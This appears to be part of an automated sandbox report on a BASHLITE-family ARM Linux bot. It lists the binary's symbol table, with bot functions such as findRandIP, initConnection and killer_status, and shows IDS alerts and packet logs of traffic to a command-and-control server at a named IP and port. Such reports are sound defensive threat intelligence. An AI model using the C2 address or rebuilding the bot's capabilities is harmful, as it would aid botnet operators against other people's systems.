__pthread_return_0	.symtab	0x15c6c	8	FUNC	<unknown>	DEFAULT	2
__read_etc_hosts_r	.symtab	0x1b6c4	480	FUNC	<unknown>	HIDDEN	2
__register_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__res_sync	.symtab	0x2fa94	4	OBJECT	<unknown>	HIDDEN	10
__resolv_attempts	.symtab	0x29333	1	OBJECT	<unknown>	HIDDEN	9
__resolv_lock	.symtab	0x2f59c	24	OBJECT	<unknown>	DEFAULT	10
__resolv_timeout	.symtab	0x29332	1	OBJECT	<unknown>	HIDDEN	9
__rtld_fini	.symtab	0x2f588	4	OBJECT	<unknown>	HIDDEN	10
__searchdomain	.symtab	0x2fa98	4	OBJECT	<unknown>	HIDDEN	10
__searchdomains	.symtab	0x2faa4	4	OBJECT	<unknown>	HIDDEN	10
__sigaddset	.symtab	0x139bc	36	FUNC	<unknown>	DEFAULT	2
__sigdelset	.symtab	0x139e0	36	FUNC	<unknown>	DEFAULT	2
__sigismember	.symtab	0x13998	36	FUNC	<unknown>	DEFAULT	2
__stdin	.symtab	0x290fc	4	OBJECT	<unknown>	DEFAULT	9
__stdio_READ	.symtab	0x199c4	92	FUNC	<unknown>	HIDDEN	2
__stdio_WRITE	.symtab	0x16ce0	184	FUNC	<unknown>	HIDDEN	2
__stdio_adjust_position	.symtab	0x19a20	192	FUNC	<unknown>	HIDDEN	2
__stdio_fwrite	.symtab	0x17084	312	FUNC	<unknown>	HIDDEN	2
__stdio_init_mutex	.symtab	0x11ea0	16	FUNC	<unknown>	HIDDEN	2
__stdio_mutex_initializer.4582	.symtab	0x1fab8	24	OBJECT	<unknown>	DEFAULT	4
__stdio_rfill	.symtab	0x19ae0	44	FUNC	<unknown>	HIDDEN	2
__stdio_seek	.symtab	0x19bc8	48	FUNC	<unknown>	HIDDEN	2
__stdio_trans2r_o	.symtab	0x19b0c	188	FUNC	<unknown>	HIDDEN	2
__stdio_trans2w_o	.symtab	0x171bc	260	FUNC	<unknown>	HIDDEN	2
__stdio_wcommit	.symtab	0x11f68	44	FUNC	<unknown>	HIDDEN	2
__stdout	.symtab	0x29100	4	OBJECT	<unknown>	DEFAULT	9
__subdf3	.symtab	0x1bb3c	740	FUNC	<unknown>	HIDDEN	2
__syscall_error	.symtab	0x16094	28	FUNC	<unknown>	HIDDEN	2
__syscall_error.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_fcntl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_rt_sigaction	.symtab	0x162f4	44	FUNC	<unknown>	DEFAULT	2
__syscall_rt_sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__uClibc_fini	.symtab	0x15ca4	108	FUNC	<unknown>	DEFAULT	2
__uClibc_init	.symtab	0x15d48	76	FUNC	<unknown>	DEFAULT	2
__uClibc_main	.symtab	0x15d94	672	FUNC	<unknown>	DEFAULT	2
__uClibc_main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__uclibc_progname	.symtab	0x29324	4	OBJECT	<unknown>	HIDDEN	9
__udivsi3	.symtab	0x115b0	248	FUNC	<unknown>	HIDDEN	2
__umodsi3	.symtab	0x116c0	204	FUNC	<unknown>	HIDDEN	2
__vfork	.symtab	0x118c0	40	FUNC	<unknown>	HIDDEN	2
__xpg_strerror_r	.symtab	0x134a8	232	FUNC	<unknown>	DEFAULT	2
__xpg_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__xstat32_conv	.symtab	0x1937c	728	FUNC	<unknown>	HIDDEN	2
__xstat64_conv	.symtab	0x1906c	784	FUNC	<unknown>	HIDDEN	2
__xstat_conv	.symtab	0x19654	204	FUNC	<unknown>	HIDDEN	2
_adjust_pos.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_bss_custom_printf_spec	.symtab	0x2f394	10	OBJECT	<unknown>	DEFAULT	10
_bss_end__	.symtab	0x2faa8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_charpad	.symtab	0x11f94	80	FUNC	<unknown>	DEFAULT	2
_cs_funcs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_custom_printf_arginfo	.symtab	0x2f6bc	40	OBJECT	<unknown>	HIDDEN	10
_custom_printf_handler	.symtab	0x2f6e4	40	OBJECT	<unknown>	HIDDEN	10
_custom_printf_spec	.symtab	0x2922c	4	OBJECT	<unknown>	HIDDEN	9
_dl_aux_init	.symtab	0x18fc0	36	FUNC	<unknown>	DEFAULT	2
_dl_phdr	.symtab	0x2fa8c	4	OBJECT	<unknown>	DEFAULT	10
_dl_phnum	.symtab	0x2fa90	4	OBJECT	<unknown>	DEFAULT	10
_edata	.symtab	0x29340	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_end	.symtab	0x2faa8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_errno	.symtab	0x2f58c	4	OBJECT	<unknown>	DEFAULT	10
_exit	.symtab	0x11c48	40	FUNC	<unknown>	DEFAULT	2
_exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fini	.symtab	0x1c618	0	FUNC	<unknown>	DEFAULT	3
_fixed_buffers	.symtab	0x2d394	8192	OBJECT	<unknown>	DEFAULT	10
_fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fp_out_narrow	.symtab	0x11fe4	128	FUNC	<unknown>	DEFAULT	2
_fpmaxtostr	.symtab	0x174c4	1952	FUNC	<unknown>	HIDDEN	2
_fpmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fwrite.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_h_errno	.symtab	0x2f590	4	OBJECT	<unknown>	DEFAULT	10
_init	.symtab	0x8094	0	FUNC	<unknown>	DEFAULT	1
_load_inttype	.symtab	0x172c0	112	FUNC	<unknown>	HIDDEN	2
_load_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_memcpy	.symtab	0x18290	0	FUNC	<unknown>	HIDDEN	2
_ppfs_init	.symtab	0x126c4	152	FUNC	<unknown>	HIDDEN	2
_ppfs_init.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_parsespec	.symtab	0x1297c	1344	FUNC	<unknown>	HIDDEN	2
_ppfs_parsespec.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_prepargs	.symtab	0x1275c	56	FUNC	<unknown>	HIDDEN	2
_ppfs_prepargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_setargs	.symtab	0x12794	412	FUNC	<unknown>	HIDDEN	2
_ppfs_setargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_promoted_size	.symtab	0x12930	76	FUNC	<unknown>	DEFAULT	2
_pthread_cleanup_pop_restore	.symtab	0x15c84	32	FUNC	<unknown>	DEFAULT	2
_pthread_cleanup_push_defer	.symtab	0x15c7c	8	FUNC	<unknown>	DEFAULT	2
_rfill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_sigintr	.symtab	0x2f70c	8	OBJECT	<unknown>	HIDDEN	10
_start	.symtab	0x8190	0	FUNC	<unknown>	DEFAULT	2
_stdio.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_stdio_fopen	.symtab	0x16d98	748	FUNC	<unknown>	HIDDEN	2
_stdio_init	.symtab	0x11e24	124	FUNC	<unknown>	HIDDEN	2
_stdio_openlist	.symtab	0x29104	4	OBJECT	<unknown>	DEFAULT	9
_stdio_openlist_add_lock	.symtab	0x29108	24	OBJECT	<unknown>	DEFAULT	9
_stdio_openlist_dec_use	.symtab	0x17dbc	320	FUNC	<unknown>	HIDDEN	2
_stdio_openlist_del_count	.symtab	0x2d390	4	OBJECT	<unknown>	DEFAULT	10
_stdio_openlist_del_lock	.symtab	0x29120	24	OBJECT	<unknown>	DEFAULT	9
_stdio_openlist_use_count	.symtab	0x2d38c	4	OBJECT	<unknown>	DEFAULT	10
_stdio_streams	.symtab	0x2913c	240	OBJECT	<unknown>	DEFAULT	9
_stdio_term	.symtab	0x11eb0	184	FUNC	<unknown>	HIDDEN	2
_stdio_user_locking	.symtab	0x29138	4	OBJECT	<unknown>	DEFAULT	9
_stdlib_strto_l	.symtab	0x151e0	408	FUNC	<unknown>	HIDDEN	2
_stdlib_strto_l.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_store_inttype	.symtab	0x17330	64	FUNC	<unknown>	HIDDEN	2
_store_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_string_syserrmsgs	.symtab	0x1fb88	2906	OBJECT	<unknown>	HIDDEN	4
_string_syserrmsgs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2w.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_uintmaxtostr	.symtab	0x17370	340	FUNC	<unknown>	HIDDEN	2
_uintmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_vfprintf_internal	.symtab	0x12064	1632	FUNC	<unknown>	HIDDEN	2
_vfprintf_internal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_wcommit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
abort	.symtab	0x14bb0	256	FUNC	<unknown>	DEFAULT	2
abort.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
access	.symtab	0x11a28	44	FUNC	<unknown>	DEFAULT	2
access.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
acnc	.symtab	0xc588	220	FUNC	<unknown>	DEFAULT	2
add_entry	.symtab	0x105b0	144	FUNC	<unknown>	DEFAULT	2
atoi	.symtab	0x151cc	12	FUNC	<unknown>	DEFAULT	2
atol	.symtab	0x151cc	12	FUNC	<unknown>	DEFAULT	2
atol.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
bcopy	.symtab	0x130a0	16	FUNC	<unknown>	DEFAULT	2
been_there_done_that	.symtab	0x2f570	4	OBJECT	<unknown>	DEFAULT	10
brk	.symtab	0x18fe4	56	FUNC	<unknown>	DEFAULT	2
brk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
bsd_signal	.symtab	0x138f4	164	FUNC	<unknown>	DEFAULT	2
buf.5390	.symtab	0x2f3a4	440	OBJECT	<unknown>	DEFAULT	10
bzero	.symtab	0x130e0	12	FUNC	<unknown>	DEFAULT	2
c	.symtab	0x290d4	4	OBJECT	<unknown>	DEFAULT	9
call___do_global_ctors_aux	.symtab	0x1c610	0	FUNC	<unknown>	DEFAULT	2
call___do_global_dtors_aux	.symtab	0x8128	0	FUNC	<unknown>	DEFAULT	2
call_frame_dummy	.symtab	0x8188	0	FUNC	<unknown>	DEFAULT	2
calloc	.symtab	0x142c0	268	FUNC	<unknown>	DEFAULT	2
calloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum_generic	.symtab	0x81cc	228	FUNC	<unknown>	DEFAULT	2
checksum_tcp_udp	.symtab	0x82b0	448	FUNC	<unknown>	DEFAULT	2
checksum_tcpudp	.symtab	0x8470	448	FUNC	<unknown>	DEFAULT	2
clock	.symtab	0x11d0c	48	FUNC	<unknown>	DEFAULT	2
clock.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
clock_getres	.symtab	0x161a4	44	FUNC	<unknown>	DEFAULT	2
clock_getres.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
close	.symtab	0x11ca0	44	FUNC	<unknown>	DEFAULT	2
close.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
closedir	.symtab	0x16320	212	FUNC	<unknown>	DEFAULT	2
closedir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
closenameservers.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
completed.4910	.symtab	0x29340	1	OBJECT	<unknown>	DEFAULT	10
connect	.symtab	0x1370c	44	FUNC	<unknown>	DEFAULT	2
connect.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
connectTimeout	.symtab	0xa02c	640	FUNC	<unknown>	DEFAULT	2
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
csum	.symtab	0xa4b0	344	FUNC	<unknown>	DEFAULT	2
data_start	.symtab	0x29024	0	NOTYPE	<unknown>	DEFAULT	9
decoded.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
decodeh.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dl-support.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dnslookup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dup2	.symtab	0x118f0	44	FUNC	<unknown>	DEFAULT	2
dup2.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encoded.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encodeh.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encodeq.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
environ	.symtab	0x2f57c	4	OBJECT	<unknown>	DEFAULT	10
errno	.symtab	0x2f58c	4	OBJECT	<unknown>	DEFAULT	10
errno.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
execl	.symtab	0x15b8c	148	FUNC	<unknown>	DEFAULT	2
execl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
execve	.symtab	0x16158	44	FUNC	<unknown>	DEFAULT	2
execve.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exit	.symtab	0x15378	148	FUNC	<unknown>	DEFAULT	2
exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exp10_table	.symtab	0x2078c	72	OBJECT	<unknown>	DEFAULT	4
fclose	.symtab	0x16b64	368	FUNC	<unknown>	DEFAULT	2
fclose.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fcntl	.symtab	0x11b04	100	FUNC	<unknown>	DEFAULT	2
fd_to_DIR	.symtab	0x163f4	188	FUNC	<unknown>	DEFAULT	2
fdgets	.symtab	0x991c	208	FUNC	<unknown>	DEFAULT	2
fdopen_pids	.symtab	0x2d378	4	OBJECT	<unknown>	DEFAULT	10
fdopendir	.symtab	0x1654c	148	FUNC	<unknown>	DEFAULT	2
fdpclose	.symtab	0x9798	388	FUNC	<unknown>	DEFAULT	2
fdpopen	.symtab	0x9514	644	FUNC	<unknown>	DEFAULT	2
fflush_unlocked	.symtab	0x17efc	464	FUNC	<unknown>	DEFAULT	2
fflush_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc	.symtab	0x17c64	188	FUNC	<unknown>	DEFAULT	2
fgetc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc_unlocked	.symtab	0x180cc	304	FUNC	<unknown>	DEFAULT	2
fgetc_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets	.symtab	0x17d20	156	FUNC	<unknown>	DEFAULT	2
fgets.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets_unlocked	.symtab	0x181fc	148	FUNC	<unknown>	DEFAULT	2
fgets_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
findRandIP	.symtab	0xa450	96	FUNC	<unknown>	DEFAULT	2
fmt	.symtab	0x20778	20	OBJECT	<unknown>	DEFAULT	4
fopen	.symtab	0x16cd4	12	FUNC	<unknown>	DEFAULT	2
fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
force_to_data	.symtab	0x29018	0	OBJECT	<unknown>	DEFAULT	9
force_to_data	.symtab	0x2933c	0	OBJECT	<unknown>	DEFAULT	9
fork	.symtab	0x119f4	44	FUNC	<unknown>	DEFAULT	2
fork.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fputs_unlocked	.symtab	0x12ebc	52	FUNC	<unknown>	DEFAULT	2
fputs_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
frame_dummy	.symtab	0x8130	0	FUNC	<unknown>	DEFAULT	2
free	.symtab	0x14980	520	FUNC	<unknown>	DEFAULT	2
free.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseek	.symtab	0x19880	12	FUNC	<unknown>	DEFAULT	2
fseeko	.symtab	0x19880	12	FUNC	<unknown>	DEFAULT	2
fseeko.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseeko64	.symtab	0x1988c	312	FUNC	<unknown>	DEFAULT	2
fseeko64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fstat	.symtab	0x1901c	80	FUNC	<unknown>	DEFAULT	2
fstat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fwrite_unlocked	.symtab	0x12ef0	172	FUNC	<unknown>	DEFAULT	2
fwrite_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getBuild	.symtab	0xeb5c	16	FUNC	<unknown>	DEFAULT	2
getHost	.symtab	0x9c14	100	FUNC	<unknown>	DEFAULT	2
getOurIP	.symtab	0xe894	712	FUNC	<unknown>	DEFAULT	2
get_hosts_byname_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getc	.symtab	0x17c64	188	FUNC	<unknown>	DEFAULT	2
getc_unlocked	.symtab	0x180cc	304	FUNC	<unknown>	DEFAULT	2
getdents64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getdtablesize	.symtab	0x11ab0	40	FUNC	<unknown>	DEFAULT	2
getdtablesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getegid	.symtab	0x161fc	8	FUNC	<unknown>	DEFAULT	2
getegid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
geteuid	.symtab	0x119ec	8	FUNC	<unknown>	DEFAULT	2
geteuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getgid	.symtab	0x1625c	8	FUNC	<unknown>	DEFAULT	2
getgid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname	.symtab	0x136b4	8	FUNC	<unknown>	DEFAULT	2
gethostbyname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname2	.symtab	0x136bc	80	FUNC	<unknown>	DEFAULT	2
gethostbyname2.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname2_r	.symtab	0x18d10	664	FUNC	<unknown>	DEFAULT	2
gethostbyname2_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname_r	.symtab	0x1b034	756	FUNC	<unknown>	DEFAULT	2
gethostbyname_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostname	.symtab	0x1b354	112	FUNC	<unknown>	DEFAULT	2
gethostname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpagesize	.symtab	0x16184	24	FUNC	<unknown>	DEFAULT	2
getpagesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpid	.symtab	0x119ac	8	FUNC	<unknown>	DEFAULT	2
getpid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getppid	.symtab	0x1191c	8	FUNC	<unknown>	DEFAULT	2
getppid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getrlimit	.symtab	0x161d0	44	FUNC	<unknown>	DEFAULT	2
getrlimit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockname	.symtab	0x13738	44	FUNC	<unknown>	DEFAULT	2
getsockname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockopt	.symtab	0x13764	48	FUNC	<unknown>	DEFAULT	2
getsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getuid	.symtab	0x1619c	8	FUNC	<unknown>	DEFAULT	2
getuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
h_errno	.symtab	0x2f590	4	OBJECT	<unknown>	DEFAULT	10
hacks	.symtab	0x29028	4	OBJECT	<unknown>	DEFAULT	9
hacks2	.symtab	0x2902c	4	OBJECT	<unknown>	DEFAULT	9
hacks3	.symtab	0x29030	4	OBJECT	<unknown>	DEFAULT	9
hacks4	.symtab	0x29034	4	OBJECT	<unknown>	DEFAULT	9
hextable	.symtab	0x1d320	1024	OBJECT	<unknown>	DEFAULT	4
hoste.5389	.symtab	0x2f55c	20	OBJECT	<unknown>	DEFAULT	10
htonl	.symtab	0x1363c	32	FUNC	<unknown>	DEFAULT	2
htons	.symtab	0x13628	20	FUNC	<unknown>	DEFAULT	2
httphex	.symtab	0xc7b0	960	FUNC	<unknown>	DEFAULT	2
i.4833	.symtab	0x290d8	4	OBJECT	<unknown>	DEFAULT	9
index	.symtab	0x1339c	236	FUNC	<unknown>	DEFAULT	2
inet_addr	.symtab	0x13690	36	FUNC	<unknown>	DEFAULT	2
inet_aton	.symtab	0x18c20	240	FUNC	<unknown>	DEFAULT	2
inet_aton.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_makeaddr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_ntop	.symtab	0x1a004	620	FUNC	<unknown>	DEFAULT	2
inet_ntop4	.symtab	0x19ec4	320	FUNC	<unknown>	DEFAULT	2
inet_pton	.symtab	0x19cc4	512	FUNC	<unknown>	DEFAULT	2
inet_pton4	.symtab	0x19bf8	204	FUNC	<unknown>	DEFAULT	2
initConnection	.symtab	0xe670	548	FUNC	<unknown>	DEFAULT	2
init_rand	.symtab	0x8778	212	FUNC	<unknown>	DEFAULT	2
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initstate	.symtab	0x14dbc	152	FUNC	<unknown>	DEFAULT	2
initstate_r	.symtab	0x15104	200	FUNC	<unknown>	DEFAULT	2
ioctl	.symtab	0x11bf8	80	FUNC	<unknown>	DEFAULT	2
ioctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
isatty	.symtab	0x13590	32	FUNC	<unknown>	DEFAULT	2
isatty.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
kill	.symtab	0x11ad8	44	FUNC	<unknown>	DEFAULT	2
kill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer_status	.symtab	0x2936c	4	OBJECT	<unknown>	DEFAULT	10
last_id.5447	.symtab	0x29330	2	OBJECT	<unknown>	DEFAULT	9
last_ns_num.5446	.symtab	0x2f598	4	OBJECT	<unknown>	DEFAULT	10
libc/string/arm/_memcpy.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/arm/bcopy.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/arm/bzero.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/arm/memcpy.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/arm/memmove.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/arm/memset.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/arm/strcmp.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/arm/strlen.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/arm/crt1.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/arm/crti.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/arm/crtn.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/arm/sigrestorer.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/arm/vfork.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libgcc2.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
listFork	.symtab	0xa2ac	420	FUNC	<unknown>	DEFAULT	2
llseek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
lseek64	.symtab	0x1b414	100	FUNC	<unknown>	DEFAULT	2
macAddress	.symtab	0x29370	6	OBJECT	<unknown>	DEFAULT	10
main	.symtab	0xeb6c	2460	FUNC	<unknown>	DEFAULT	2

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-05-10T07:48:50.662762+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40808	TCP
2025-05-10T07:49:06.217459+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40810	TCP
2025-05-10T07:49:22.058608+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40812	TCP
2025-05-10T07:49:37.628760+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40814	TCP
2025-05-10T07:49:53.188763+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40816	TCP
2025-05-10T07:50:08.750909+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40818	TCP
2025-05-10T07:50:24.312854+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40820	TCP
2025-05-10T07:50:39.871661+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40822	TCP
2025-05-10T07:50:55.432758+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40824	TCP
2025-05-10T07:51:10.991025+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40826	TCP
2025-05-10T07:51:26.552501+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40828	TCP
2025-05-10T07:51:42.111035+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40830	TCP
2025-05-10T07:51:57.666832+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40832	TCP
2025-05-10T07:52:13.225744+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40834	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2025 07:48:50.115413904 CEST	40808	666	192.168.2.14	92.60.77.69
May 10, 2025 07:48:50.390012026 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:48:50.390073061 CEST	40808	666	192.168.2.14	92.60.77.69
May 10, 2025 07:48:50.390397072 CEST	40808	666	192.168.2.14	92.60.77.69
May 10, 2025 07:48:50.662722111 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:48:50.662761927 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:48:50.662805080 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:48:50.662899017 CEST	40808	666	192.168.2.14	92.60.77.69
May 10, 2025 07:48:50.935295105 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:49:05.670747995 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:05.943778038 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:49:05.944353104 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:05.946324110 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:06.217458963 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:49:06.217519045 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:49:06.218086004 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:06.218199015 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:06.218842983 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:49:06.490745068 CEST	666	40810	92.60.77.69	192.168.2.14
